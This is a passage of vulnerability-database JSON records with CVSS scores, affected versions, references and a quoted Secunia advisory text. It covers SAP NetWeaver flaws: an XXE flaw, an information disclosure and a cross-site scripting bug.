"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002168"
},
{
"db": "NVD",
"id": "CVE-2016-4014"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.4,
"url": "https://erpscan.com/advisories/erpscan-16-020-sap-netweaver-java-uddi-component-xxe-vulnerability/"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/137919/sap-netweaver-as-java-7.4-xxe-injection.html"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2016/jul/45"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-16-020-sap-netweaver-java-uddi-component-xxe-vulnerability/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-4014"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-4014"
},
{
"trust": 0.6,
"url": "https://erpscan.com/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "88021"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002168"
},
{
"db": "NVD",
"id": "CVE-2016-4014"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-307"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "88021"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002168"
},
{
"db": "NVD",
"id": "CVE-2016-4014"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-307"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-04-14T00:00:00",
"db": "BID",
"id": "88021"
},
{
"date": "2016-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002168"
},
{
"date": "2016-04-14T14:59:09.147000",
"db": "NVD",
"id": "CVE-2016-4014"
},
{
"date": "2016-04-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-307"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-04-14T00:00:00",
"db": "BID",
"id": "88021"
},
{
"date": "2016-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002168"
},
{
"date": "2018-12-10T19:29:17.470000",
"db": "NVD",
"id": "CVE-2016-4014"
},
{
"date": "2016-04-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-307"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-307"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver JAVA AS of UDDI In the component XML External entity vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002168"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-307"
}
],
"trust": 0.6
}
}
var-202007-1110
Vulnerability from variot
SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI) (versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50), under certain conditions allows an attacker to access information which would otherwise be restricted, leading to Information Disclosure. SAP NetWeaver There is an information leakage vulnerability in.Information may be obtained
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202007-1110",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.50"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-007719"
},
{
"db": "NVD",
"id": "CVE-2020-6285"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6285"
}
]
},
"cve": "CVE-2020-6285",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-007719",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.1,
"impactScore": 4.0,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-007719",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-6285",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2020-6285",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-007719",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202007-796",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-007719"
},
{
"db": "NVD",
"id": "CVE-2020-6285"
},
{
"db": "NVD",
"id": "CVE-2020-6285"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-796"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI) (versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50), under certain conditions allows an attacker to access information which would otherwise be restricted, leading to Information Disclosure. SAP NetWeaver There is an information leakage vulnerability in.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6285"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-007719"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-6285",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-007719",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202007-796",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-007719"
},
{
"db": "NVD",
"id": "CVE-2020-6285"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-796"
}
]
},
"id": "VAR-202007-1110",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T14:00:28.133000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - July 2020",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=552599675"
},
{
"title": "SAP NetWeaver-XML Toolkit for JAVA Repair measures for information disclosure vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=124657"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-007719"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-796"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-200",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-007719"
},
{
"db": "NVD",
"id": "CVE-2020-6285"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2932473"
},
{
"trust": 1.6,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=552599675"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6285"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-6285"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-of-july-2020-32835"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-007719"
},
{
"db": "NVD",
"id": "CVE-2020-6285"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-796"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-007719"
},
{
"db": "NVD",
"id": "CVE-2020-6285"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-796"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-007719"
},
{
"date": "2020-07-14T13:15:12.827000",
"db": "NVD",
"id": "CVE-2020-6285"
},
{
"date": "2020-07-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202007-796"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-007719"
},
{
"date": "2021-07-21T11:39:23.747000",
"db": "NVD",
"id": "CVE-2020-6285"
},
{
"date": "2021-01-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202007-796"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202007-796"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Vulnerability regarding information leakage in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-007719"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202007-796"
}
],
"trust": 0.6
}
}
var-201302-0006
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in SAP NetWeaver 7.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the server parameter. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing Find out more, take a free test drive, and share your opinion with us: http://secunia.com/blog/242
TITLE: SAP NetWeaver "server" Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID: SA45708
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45708/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45708
RELEASE DATE: 2011-08-23
DISCUSS ADVISORY: http://secunia.com/advisories/45708/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/45708/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45708
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Dmitriy Evdokimov has reported a vulnerability in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks.
Input passed via the "server" parameter to the RetrieveMailExamples servlet is not properly sanitised before being returned to the user.
SOLUTION: Apply fixes. Please see the vendor's advisory for details.
PROVIDED AND/OR DISCOVERED BY: Dmitriy Evdokimov, Digital Security Research Group (DSecRG).
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1553292
Digital Security Research Group: http://dsecrg.com/pages/vul/show.php?id=330
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201302-0006",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.5,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.5,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.5,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "lte",
"trust": 1.8,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.30"
},
{
"model": null,
"scope": "eq",
"trust": 1.0,
"vendor": "netweaver",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": "7.01"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": "7.02"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": "7.10"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3299"
},
{
"db": "BID",
"id": "49266"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001563"
},
{
"db": "NVD",
"id": "CVE-2011-5263"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-164"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:sp15:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:sp8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.30",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-5263"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitriy Evdokimov, Digital Security Research Group (DSecRG)",
"sources": [
{
"db": "BID",
"id": "49266"
}
],
"trust": 0.3
},
"cve": "CVE-2011-5263",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2011-5263",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "7c5c70e2-1f8b-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
